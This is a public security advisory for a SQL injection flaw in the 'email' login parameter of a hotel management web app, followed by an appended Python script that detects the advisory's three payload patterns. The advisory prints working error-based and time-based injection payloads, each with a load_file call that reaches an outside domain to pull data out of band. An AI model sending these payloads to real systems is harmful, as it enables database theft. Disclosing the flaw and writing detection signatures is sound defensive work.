Multi-Language Hotel Management 2022 1.0 SQL Injection
Multi-Language Hotel Management 2022 version 1.0 suffers from a remote SQL injection vulnerability.
## Title: Multi-Language-Hotel-Management-2022 1.0 SQLi

## Author: nu11secur1ty

## Date: 08.03.2022

## Vendor: https://www.nikhilbhalerao.com/

## Software: https://github.com/nu11secur1ty/CVE-nu11secur1ty/blob/main/vendors/Nikhil%20Bhalerao/2022/Multi-Language-Hotel-Management-2022/Docs/sparkz.zip

## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Nikhil%20Bhalerao/2022/Multi-Language-Hotel-Management-2022

## Description:
The `email` parameter appears to be vulnerable to SQL injection attacks.
The payload `'+(select load_file('\\\\kpdw69idt7zx6jw1ehdh1469o0utikd84bs3ft3i.tupunger.com\\ais'))+'` was submitted in the email parameter.
This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain.
The attacker can easily get the whole database from this hotel system and can do very malicious stuff with the users who are inside of this system.

Status: CRITICAL

[+] Payloads:

```mysql
---
Parameter: email (POST)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: [email protected]'+(select load_file('\\\\kpdw69idt7zx6jw1ehdh1469o0utikd84bs3ft3i.tupunger.com\\ais'))+''||(SELECT 0x55644a42 WHERE 3972=3972 AND (SELECT 1380 FROM(SELECT COUNT(*),CONCAT(0x7162787671,(SELECT(ELT(1380=1380,1))),0x7178787671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'&password=m5S!k0l!S6&login=

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: [email protected]'+(select load_file('\\\\kpdw69idt7zx6jw1ehdh1469o0utikd84bs3ft3i.tupunger.com\\ais'))+''||(SELECT 0x48536341 WHERE 9809=9809 AND (SELECT 5116 FROM(SELECT(SLEEP(15)))ygbC))||'&password=m5S!k0l!S6&login=
---
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Nikhil%20Bhalerao/2022/Multi-Language-Hotel-Management-2022)

## Proof and Exploit:
[href](https://streamable.com/uk7zq2)
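A detection check for the three payload types listed above, as an added example that is not part of the original advisory: it scans form-encoded POST bodies for a `load_file` call on a UNC path, a `SLEEP()` sub-query, and the `FLOOR(RAND(0)*2)` error-based pattern. The function name, signature labels and sample request bodies are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# One signature per technique named in the advisory's payload list.
# Labels are hypothetical names chosen for this example.
SIGNATURES = {
    # load_file('\\\\host\\share'): out-of-band read via a UNC path
    "oob-load_file-unc": re.compile(r"load_file\s*\(\s*[\"']\\{2,}", re.I),
    # (SELECT(SLEEP(15))): time-based blind
    "time-based-sleep": re.compile(r"\bsleep\s*\(\s*\d+\s*\)", re.I),
    # FLOOR(RAND(0)*2) with GROUP BY: error-based duplicate-key trick
    "error-based-floor-rand": re.compile(
        r"floor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\)", re.I),
}

def scan_body(body):
    """Return (parameter, signature) hits for one form-encoded POST body.

    parse_qsl URL-decodes each value first, so %5C and '+' encodings
    do not hide the pattern from the regexes.
    """
    hits = []
    for name, value in parse_qsl(body, keep_blank_values=True):
        for label, rx in SIGNATURES.items():
            if rx.search(value):
                hits.append((name, label))
    return hits

# Constructed sample login requests (not captured traffic); the host
# oob.example.invalid is a placeholder.
SAMPLES = [
    "email=guest%40example.com&password=x&login=",
    "email=a%40example.com'%2B(select+load_file("
    "'%5C%5C%5C%5Coob.example.invalid%5C%5Cais'))%2B'&password=x&login=",
    "email=a%40example.com'||(SELECT+1+FROM(SELECT(SLEEP(15)))a)||'"
    "&password=x&login=",
    "email=a%40example.com'||(SELECT+1+FROM(SELECT+COUNT(*),"
    "CONCAT(1,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.PLUGINS"
    "+GROUP+BY+x)a)||'&password=x&login=",
]

if __name__ == "__main__":
    for body in SAMPLES:
        print(scan_body(body) or "clean", "<-", body[:60])
```

Matches like these are indicators for triage in web or WAF logs; the fix for the flaw itself is to bind `email` as a query parameter instead of concatenating it into the SQL string.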